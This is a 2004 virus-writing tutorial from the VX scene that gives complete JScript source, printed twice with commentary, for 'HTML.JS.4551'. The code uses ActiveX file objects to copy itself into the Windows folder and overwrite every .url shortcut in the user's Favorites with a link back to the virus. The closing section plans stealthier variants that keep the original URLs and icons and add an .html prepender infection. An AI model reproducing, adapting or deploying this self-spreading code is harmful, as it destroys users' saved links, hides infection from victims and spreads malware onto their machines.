Your favorites, my victims - .url infection in JavaScript    [by DiA]

  

                   Your favorites, my victims - .url infection in JavaScript
                   ---------------------------------------------------------

                                    by DiA (c)04 GermanY
                                      www.vx-dia.de.vu
                                  DiA_hates_machine@gmx.de



____________________________________________________________________________________________



Do with this code what you want. I am not responsible for things you do. If you write
new code, or rewrite this, YOU and only YOU are responsible for this code. Take care!

  __________________________
 | 1. Intro                 |
 | 2. URL file format       |
 | 3. Code with description |
 | 4. Idea's and Goal's     |
 | 5. Outro                 |
 |__________________________|



1. Intro
--------

Everybody has favorite site's in the i-net. But they can't remember all the URL's, so
they add every site they use to the "favorites". You can found them on IE under menu
"favorites" (what else?!). But you will only see the page's title, like "VX Heavens" or
"vx - DiA" ;). But where are the link's to this sites? It store's as *.url file in the
"favorites" folder in windows, like "C:\Windows\Favorites\". In this tut we want to
overwrite this *.url files, with a .url file linked to our Virus. Let's do this...
...have fun!



2. URL file format
------------------

[InternetShortcut]                      - hey windows, it's a InternetShurtcut!
URL=http://www.vx-dia.de.vu/	        - the linked site, our virus will be in location
                                          "file:///C:\Windows\4551.htm"
WorkingDirectory=C:\WINDOWS\            - not interresting for this tut
ShowCommand=7                           - not interresting for this tut
IconIndex=1                             - not interresting for this tut
IconFile=C:\WINDOWS\SYSTEM\url.dll      - not interresting for this tut
Modified=20F06BA06D07BD014D             - not interresting for this tut
HotKey=1601                             - not interresting for this tut



3. Code with description
------------------------

First without description:

<html>
<head>
<script language="JavaScript">

ThisFile = location.href;

if (ThisFile.indexOf("file:///") != -1) {

	wshell = new ActiveXObject("WScript.Shell");
	fso = new ActiveXObject("Scripting.FileSystemObject")

	FavFolder = wshell.SpecialFolders("Favorites") + "\\";
	WinFolder = fso.GetSpecialFolder(0) + "\\";

	ThisFile = location.href.substr(8);
	Virus = fso.GetFile(ThisFile);

	Virus.Copy(WinFolder + "4551.htm");

	fso.CreateTextFile(WinFolder + "4551.url");
	URLFile = fso.OpenTextFile(WinFolder + "4551.url",2,false,0);
	URLFile.WriteLine("[InternetShortcut]");
	URLFile.WriteLine("URL=file:///" + WinFolder + "4551.htm");
	URLFile.Close();
	FakeURL = fso.GetFile(WinFolder + "4551.url");

	Favorit = fso.GetFolder(FavFolder);
	FindFile = new Enumerator(Favorit.Files);
	FindFile.moveFirst();

	while (FindFile.atEnd() == false) {
		Victim = FindFile.item();

		URLType = new String(Victim);
		len = URLType.length;

		if (URLType.indexOf("url",len-3) != -1) {
			FakeURL.Copy(Victim);
		}

		FindFile.moveNext();
	}
}

else {
	alert("HTML.JS.4551 - Virus\n\nOnly a *.url infection sample!\n\n\n\Only works's under loacation file:///\n\n\n\n\nby DiA (c)04 - www.vx-dia.de.vu");
}

</script>
</head>

<body link="#000000" alink="#000000" vlink="#000000">
<div align="center">
<h1>HTML.JS.4551 - *.url infection sample</h1><br><br>

by DiA (c)04 GermanY<br>
<a href="http://www.vx-dia.de.vu">www.vx-dia.de.vu</a><br>
<a href="mailto:DiA_hates_machine@gmx.de">DiA_hates_machine@gmx.de</a></div>
</body>
</html>


And now with description for better understanding, but ugly lookin ;) :

<html>
<head>
<script language="JavaScript">

// we do it in JavaScript


ThisFile = location.href;

//looks like "file:///C:\Tests\4551.htm"


if (ThisFile.indexOf("file:///") != -1) {

// only run virus if location is "file:///" and not "http://"


	wshell = new ActiveXObject("WScript.Shell");
	fso = new ActiveXObject("Scripting.FileSystemObject")

// create wshell to read the "Favorites" path
// create fso to handle files


	FavFolder = wshell.SpecialFolders("Favorites") + "\\";
	WinFolder = fso.GetSpecialFolder(0) + "\\";

// save "Favorites" path to infect .url files
// save "Windows" path to copy virus, and drop Fake .url file


	ThisFile = location.href.substr(8);
	Virus = fso.GetFile(ThisFile);

// remove "file:///" to handle with the path
// get virus file, to copy it


	Virus.Copy(WinFolder + "4551.htm");

// copy virus to Windows\4551.htm, like "C:\Windows\4551.htm"


	fso.CreateTextFile(WinFolder + "4551.url");
	URLFile = fso.OpenTextFile(WinFolder + "4551.url",2,false,0);
	URLFile.WriteLine("[InternetShortcut]");
	URLFile.WriteLine("URL=file:///" + WinFolder + "4551.htm");
	URLFile.Close();
	FakeURL = fso.GetFile(WinFolder + "4551.url");

// create FakeURL file, every time
// write the path to the virus in this .url
// now 4551.url looks like:
//  [InternetShortcut]
//  URL=file:///C:\Windows\4551.htm
// if you execute this 4551.url, you will see the virus again ;)


	Favorit = fso.GetFolder(FavFolder);
	FindFile = new Enumerator(Favorit.Files);
	FindFile.moveFirst();

// get favorite folder to handle with it
// create a new enumerator to find all (!) files in this directory
// find first file


	while (FindFile.atEnd() == false) {

// do a while(), to find all files in one directory
// if no more files -> exit while()


		Victim = FindFile.item();

// save path of victim, like "C:\Windows\Favorites\GMX.url"


		URLType = new String(Victim);
		len = URLType.length;

// create a new string object of the victim path, to handle with
// get lenght of the path, to check extensions of files


		if (URLType.indexOf("url",len-3) != -1) {

// infect only if last 3 char's contains "url"


			FakeURL.Copy(Victim);

// overwrite victim with dropped FakeURL file


		}

		FindFile.moveNext();

// Find next file in "favorites" folder


	}
}

// end if


else {
	alert("HTML.JS.4551 - Virus\n\nOnly a *.url infection sample!\n\n\n\Only works's under loacation file:///\n\n\n\n\nby DiA (c)04 - www.vx-dia.de.vu");
}

// if we are on another location (like ftp:// or http://) show only a message, and DON'T run
// virus file


</script>
</head>

<body link="#000000" alink="#000000" vlink="#000000">
<div align="center">
<h1>HTML.JS.4551 - *.url infection sample</h1><br><br>

by DiA (c)04 GermanY<br>
<a href="http://www.vx-dia.de.vu">www.vx-dia.de.vu</a><br>
<a href="mailto:DiA_hates_machine@gmx.de">DiA_hates_machine@gmx.de</a></div>
</body>
</html>



4. Idea's and Goal's
--------------------

The user will check that somethin is wrong, when no favorite work's anymore! So we must find
a way to infect .url's, but load the site that should be load! So, we must read first the
real URL before overwrite the .url.

Maybe we found the file "vx - DiA.url":
1. Read real URL from this file
2. store it in another file, like "vx - DiA.txt"
3. overwrite this file with FakeURL file

When the "vx - DiA.url" are executed, the virus will do the work:
1. Infect files
2. read real URL from "vx - DiA.txt"
3. load this site


I am workin on this method, but the problem is that every .url is not the same like:

[InternetShortcut]
URL=http://www.vx-dia.de.vu


Someone look's like:

[DEFAULT]
BASEURL=http://www.f-prot.de/down/tools-f.php

[InternetShortcut]
URL=http://www.f-prot.de/down/tools-f.php
IconFile=http://www.f-prot.de/favicon.ico
IconIndex=1


Another problem is, that most .url files has a own Icon, so we must read the icon location
and write this locatin in our FakeURL file, that it look's like:

[InternetShortcut]
URL=file:///C:\Windows\4551.htm
IconFile=http://www.f-prot.de/favicon.ico
IconIndex=1


I am working on this problem's, and write a HTML.JS Virus:
- .html infection -> prepender
- .url infection -> load real site
- don't change icon, or something, only change URL=...
- and other features...



5. Outro
--------

I hope you enjoyed this little tutorial, if you had any comment's send me a mail to
DiA_hates_machine@gmx.de ! That's all at this time, now i go on with the problem's =)

Have fun...
Code on...

bye, DiA [06.05.04 - GermanY]